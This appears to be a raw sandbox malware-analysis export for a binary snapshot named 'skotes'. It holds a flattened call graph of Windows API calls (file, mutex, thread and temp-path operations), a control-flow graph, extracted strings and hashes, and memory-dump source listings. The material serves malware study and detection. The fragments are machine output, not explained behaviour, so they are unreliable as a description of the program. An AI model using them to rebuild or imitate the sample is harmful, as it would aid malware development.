Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37487->37488 37490 ab467e 37488->37490 37489 ab9280 RtlAllocateHeap 37489->37493 37491 ab3640 12 API calls 37490->37491 37492 ab4610 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup 37491->37492 37492->37460 37493->37486 37493->37489 37493->37492 37494 ab7a00 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37493->37494 37507 ab3640 37493->37507 37494->37493 37497 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37496->37497 37498 aa991e 37497->37498 37499 aa5c10 4 API calls 37498->37499 37500 aa9927 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37499->37500 37500->37453 37502 ad8ad1 37501->37502 37629 ad8868 37502->37629 37504 ad8adb 37504->37457 37506->37460 37508 ab367f 37507->37508 37509 ab3e6f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback 37507->37509 37510 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37508->37510 37509->37493 37512 ab36b0 37510->37512 37511 ab4327 37624 ab8200 RtlAllocateHeap 37511->37624 37512->37511 37513 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37512->37513 37515 ab36ff 37513->37515 37515->37511 37518 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37515->37518 37516 ab432c 37625 ab8200 RtlAllocateHeap 37516->37625 37519 ab3743 37518->37519 37519->37511 37520 ab3765 37519->37520 37521 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37520->37521 37523 ab3785 37521->37523 37522 ab4331 Concurrency::details::_CancellationTokenState::_RegisterCallback 37626 ab8200 RtlAllocateHeap 37522->37626 37525 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37523->37525 37526 ab3798 37525->37526 37527 aa5c10 4 API calls 37526->37527 37530 ab37a3 37527->37530 37528 ab4340 Concurrency::details::_CancellationTokenState::_RegisterCallback 37627 abc199 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::_TaskCollection::~_TaskCollection 37528->37627 37530->37516 37531 ab37ef 37530->37531 37532 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37531->37532 37535 ab3811 Concurrency::details::SchedulerProxy::Cleanup 37532->37535 37534 aa98f0 4 API calls 37536 ab3872 37534->37536 37535->37522 37535->37534 37537 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37536->37537 37541 ab3c79 Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback 37536->37541 37538 ab3889 37537->37538 37539 aa5c10 4 API calls 37538->37539 37540 ab3894 37539->37540 37542 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37540->37542 37541->37509 37628 abc1d9 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::_TaskCollection::~_TaskCollection 37541->37628 37543 ab38dc Concurrency::details::SchedulerProxy::Cleanup 37542->37543 37543->37522 37544 ab39bd 37543->37544 37595 ab3ab7 __dosmaperr Concurrency::details::SchedulerProxy::Cleanup 37543->37595 37545 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37544->37545 37546 ab39da 37545->37546 37620 aaad70 4 API calls 4 library calls 37546->37620 37547 ad8ab6 3 API calls 37549 ab3b7a 37547->37549 37549->37528 37550 ab3b89 37549->37550 37550->37541 37552 ab3c8d 37550->37552 37553 ab3ba2 37550->37553 37554 ab3f42 37550->37554 37555 ab3e74 37550->37555 37551 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37556 ab3a96 37551->37556 37558 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37552->37558 37560 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37553->37560 37559 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37554->37559 37557 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37555->37557 37562 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37556->37562 37563 ab3e9c 37557->37563 37564 ab3cb5 37558->37564 37565 ab3f56 37559->37565 37566 ab3bca 37560->37566 37561 ab39e5 Concurrency::details::SchedulerProxy::Cleanup 37561->37528 37561->37551 37567 ab3aa8 37562->37567 37568 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37563->37568 37569 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37564->37569 37570 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37565->37570 37571 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37566->37571 37621 aa49a0 RtlAllocateHeap Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback 37567->37621 37574 ab3eba 37568->37574 37575 ab3cd3 37569->37575 37576 ab3f6e 37570->37576 37572 ab3be8 37571->37572 37577 aa5c10 4 API calls 37572->37577 37578 aa5c10 4 API calls 37574->37578 37579 aa5c10 4 API calls 37575->37579 37580 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37576->37580 37581 ab3bef 37577->37581 37582 ab3ec1 37578->37582 37583 ab3cda 37579->37583 37584 ab3f86 37580->37584 37585 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37581->37585 37586 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37582->37586 37587 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37583->37587 37588 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37584->37588 37589 ab3c07 37585->37589 37590 ab3ed9 37586->37590 37591 ab3cef 37587->37591 37592 ab3f98 37588->37592 37593 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37589->37593 37594 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37590->37594 37596 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37591->37596 37623 ab2f10 12 API calls 4 library calls 37592->37623 37598 ab3c1f 37593->37598 37599 ab3ef1 37594->37599 37595->37528 37595->37547 37600 ab3d07 37596->37600 37601 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37598->37601 37602 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37599->37602 37603 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37600->37603 37604 ab3c37 37601->37604 37605 ab3f09 37602->37605 37606 ab3d1f 37603->37606 37607 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37604->37607 37608 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37605->37608 37609 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37606->37609 37611 ab3c4f 37607->37611 37612 ab3f21 37608->37612 37610 ab3d37 37609->37610 37614 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37610->37614 37615 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37611->37615 37613 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37612->37613 37616 ab3c67 37613->37616 37617 ab3d49 37614->37617 37615->37616 37619 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37616->37619 37622 ab1ec0 12 API calls 4 library calls 37617->37622 37619->37541 37620->37561 37621->37595 37622->37541 37623->37541 37628->37509 37630 ad887a 37629->37630 37634 ad888f __dosmaperr ___std_exception_copy 37630->37634 37635 ad690a 37630->37635 37633 ad88bf 37633->37634 37643 ad6d52 GetPEB GetPEB RtlAllocateHeap __fassign __wsopen_s 37633->37643 37634->37504 37636 ad692a 37635->37636 37637 ad6921 37635->37637 37636->37637 37644 ada671 GetPEB GetPEB __dosmaperr __freea __purecall 37636->37644 37637->37633 37639 ad694a 37645 adb5fb GetPEB GetPEB __fassign 37639->37645 37641 ad6960 37646 adb628 GetPEB GetPEB __fassign 37641->37646 37643->37633 37644->37639 37645->37641 37646->37637 37659 aa9ba5 GetFileAttributesA 37661 aa9bb5 Concurrency::details::SchedulerProxy::Cleanup 37659->37661 37660 aaa91c Concurrency::details::_CancellationTokenState::_RegisterCallback 37663 aaa960 Sleep CreateMutexA 37660->37663 37661->37660 37662 aa9c80 Concurrency::details::SchedulerProxy::Cleanup 37661->37662 37664 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37662->37664 37667 aaa98e 37663->37667 37665 aaa903 37664->37665 37666 aaa9a7 37667->37666 37670 ad6629 GetPEB GetPEB __purecall 37667->37670 37669 aaa9b0 37670->37669 37707 ad6dda 37708 ad6de8 37707->37708 37709 ad6df6 37707->37709 37710 ad6e4c 8 API calls 37708->37710 37718 ad698d 37709->37718 37712 ad6df2 37710->37712 37713 ad6e10 37721 ad68ed 37713->37721 37717 ad6e24 __freea 37719 ad690a __fassign 2 API calls 37718->37719 37720 ad699f __wsopen_s 37719->37720 37720->37713 37735 ad683b 37721->37735 37723 ad6905 37723->37717 37724 ad6e4c 37723->37724 37725 ad6e77 Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37724->37725 37731 ad6e5a __dosmaperr ___std_exception_copy 37724->37731 37726 ad6eb9 CreateFileW 37725->37726 37734 ad6e9d __dosmaperr ___std_exception_copy 37725->37734 37727 ad6edd 37726->37727 37728 ad6eeb 37726->37728 37744 ad6fb4 GetFileType 37727->37744 37756 ad6f2a GetPEB RtlAllocateHeap GetPEB __dosmaperr 37728->37756 37731->37717 37732 ad6ee6 Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37733 ad6f1c CloseHandle 37732->37733 37732->37734 37733->37734 37734->37717 37736 ad6863 37735->37736 37741 ad6849 __dosmaperr __fassign __wsopen_s 37735->37741 37737 ad686a 37736->37737 37739 ad6889 __fassign 37736->37739 37737->37741 37742 ad69e6 RtlAllocateHeap __wsopen_s 37737->37742 37739->37741 37743 ad69e6 RtlAllocateHeap __wsopen_s 37739->37743 37741->37723 37742->37741 37743->37741 37745 ad6fef Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37744->37745 37755 ad7085 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z __dosmaperr 37744->37755 37746 ad7028 GetFileInformationByHandle 37745->37746 37745->37755 37747 ad703e 37746->37747 37746->37755 37757 ad727c 37747->37757 37751 ad705b 37752 ad7124 SystemTimeToTzSpecificLocalTime 37751->37752 37753 ad706e 37752->37753 37754 ad7124 SystemTimeToTzSpecificLocalTime 37753->37754 37754->37755 37755->37732 37756->37732 37758 ad7292 _wcsrchr 37757->37758 37759 ad704a 37758->37759 37771 adbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37758->37771 37767 ad7124 37759->37767 37761 ad72d6 37761->37759 37772 adbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37761->37772 37763 ad72e7 37763->37759 37773 adbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37763->37773 37765 ad72f8 37765->37759 37774 adbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37765->37774 37768 ad713c 37767->37768 37769 ad715c SystemTimeToTzSpecificLocalTime 37768->37769 37770 ad7142 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 37768->37770 37769->37770 37770->37751 37771->37761 37772->37763 37773->37765 37774->37759 37775 aa7590 Sleep 37776 aa75e3 37775->37776 37777 aa765e 37775->37777 37790 abd111 SleepConditionVariableCS 37776->37790 37778 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37777->37778 37780 aa767a 37778->37780 37782 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37780->37782 37781 aa75ed 37781->37777 37791 abd64e RtlAllocateHeap 37781->37791 37783 aa7693 37782->37783 37785 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37783->37785 37787 aa76ac CreateThread Sleep 37785->37787 37786 aa7654 37792 abd0c7 RtlWakeAllConditionVariable 37786->37792 37789 aa76d9 Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback 37787->37789 37793 aa7430 37787->37793 37790->37781 37791->37786 37792->37777 37794 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37793->37794 37795 aa7465 37794->37795 37796 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37795->37796 37797 aa7478 37796->37797 37798 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37797->37798 37799 aa7488 37798->37799 37800 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37799->37800 37801 aa749d 37800->37801 37802 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37801->37802 37803 aa74b2 37802->37803 37804 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37803->37804 37805 aa74c4 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup 37804->37805 37806 aa8b30 GetTempPathA 37807 ab7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37806->37807 37808 aa8b8c 37807->37808 37809 aa5c10 4 API calls 37808->37809 37810 aa8b97 37809->37810 37811 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37810->37811 37812 aa8be3 37811->37812 37813 ab80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37812->37813 37814 aa8c35 37813->37814 37815 ab8220 RtlAllocateHeap 37814->37815 37816 aa8c47 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::_CancellationTokenState::_RegisterCallback 37815->37816 37829 adac53 37834 adaa29 37829->37834 37831 adac69 37832 adac92 37831->37832 37842 ae1a9c 37831->37842 37835 adaa48 37834->37835 37840 adaa5b __dosmaperr ___std_exception_copy 37835->37840 37845 ae132b GetPEB GetPEB __dosmaperr ___std_exception_copy 37835->37845 37837 adabe0 37837->37840 37846 ae132b GetPEB GetPEB __dosmaperr ___std_exception_copy 37837->37846 37839 adabfe 37839->37840 37847 ae132b GetPEB GetPEB __dosmaperr ___std_exception_copy 37839->37847 37840->37831 37848 ae1461 37842->37848 37844 ae1ab7 37844->37832 37845->37837 37846->37839 37847->37840 37849 ae146d CallCatchBlock 37848->37849 37851 ae1474 __dosmaperr ___std_exception_copy __wsopen_s 37849->37851 37852 ae1a2e 37849->37852 37851->37844 37853 ad698d __wsopen_s 2 API calls 37852->37853 37854 ae1a50 37853->37854 37855 ad68ed __wsopen_s RtlAllocateHeap 37854->37855 37856 ae1a5d 37855->37856 37858 ae1a64 __freea 37856->37858 37859 ae1abc 37856->37859 37858->37851 37860 ae1ad9 __wsopen_s 37859->37860 37867 ae1aee __dosmaperr __wsopen_s 37860->37867 37873 ae1775 CreateFileW 37860->37873 37862 ae1be2 GetFileType 37865 ae1c34 __wsopen_s 37862->37865 37862->37867 37863 ae1b65 37863->37862 37863->37867 37874 ae1775 CreateFileW 37863->37874 37868 ae1ca1 37865->37868 37875 ae1984 GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 37865->37875 37866 ae1baa 37866->37862 37866->37867 37867->37858 37868->37867 37876 ae1522 3 API calls 3 library calls 37868->37876 37871 ae1cd6 37871->37867 37877 ae1775 CreateFileW 37871->37877 37873->37863 37874->37866 37875->37868 37876->37871 37877->37867

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 433 aae530-aae843 call ab7a00 call aa5c10 call ab7a00 call aa5c10 call ab9280 call ab8320 call ab8220 call ab8320 call ab7a00 * 3 call aabe30 call ab7a00 * 2 call aa5c10 call aa8580 471 aaea1a-aaea62 433->471 472 aae8ce-aae9ec 433->472 471->472 475 aaea8f-aaea96 call abd663 471->475 481 aaea99-aaeab2 call abcff1 472->481 482 aae9f2-aae9fe 472->482 475->481 482->475 483 aaea04-aaea12 482->483 483->471 485 aaeab8-aaee79 call ad6c6a * 2 call ab7a00 call aa5c10 call ab83c0 call ab8220 GetFileAttributesA call ab7a00 call aa5c10 call ab83c0 call ab8220 GetFileAttributesA 483->485 521 aaf5bb-aaf66c call ab80c0 485->521 522 aaf273-aaf28b 485->522 521->522 527 aaf699-aaf6a0 call abd663 521->527 524 aaf6a3-aaf6b6 522->524 525 aaf291-aaf29d 522->525 525->527 528 aaf2a3-aaf2b1 525->528 527->524 528->521 531 aaf6cb-aaf962 call ad6c6a call ab7a00 call aa5c10 call ab7a00 * 4 call aae530 call ab80c0 call ab7a00 call ab80c0 * 2 528->531 565 aaf98c-aaf9a5 call abcff1 531->565 566 aaf964-aaf970 531->566 567 aaf982-aaf989 call abd663 566->567 568 aaf972-aaf980 566->568 567->565 568->567 571 aaf9ab-aafb15 call ad6c6a call ab7a00 call aa5c10 call ab7a00 * 4 call aae530 568->571 595 aafb3f-aafb4e 571->595 596 aafb17-aafb23 571->596 597 aafb35-aafb3c call abd663 596->597 598 aafb25-aafb33 596->598 597->595 598->597 599 aafb4f-aafc6f call ad6c6a call ab7a00 call aa9580 call aa9230 call ab8320 598->599 615 aafc70-aafc75 599->615 615->615 616 aafc77-ab0860 call ab80c0 call ab7a00 * 2 call aac360 call ad6729 call ab7a00 call aa5c10 call ab7a00 * 4 call aae530 615->616 651 ab088a-ab08a5 call abcff1 616->651 652 ab0862-ab086e 616->652 653 ab0880-ab0887 call abd663 652->653 654 ab0870-ab087e 652->654 653->651 654->653 656 ab08ce-ab1537 call ad6c6a call ab7a00 call aa5c10 call ab7a00 * 4 call aae530 654->656
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                                                                                                                                                                                                                                • API String ID: 0-2571795437
                                                                                                                                                                                                                                                                • Opcode ID: 7851a2c79dd94b6b83223d69a599887750650911dc219b0c3131d58ac2a75b5a
                                                                                                                                                                                                                                                                • Instruction ID: 5fd6de1065083e3251b193c09db00a474e1c32a9e02ca3755a940882ff290be0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7851a2c79dd94b6b83223d69a599887750650911dc219b0c3131d58ac2a75b5a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE82D570904288DFEF14EF68CA597DE7FB5AB46304F508588E805273C2D7799A88CBD2

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AAEB51
                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000), ref: 00AAEC83
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AAED98
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
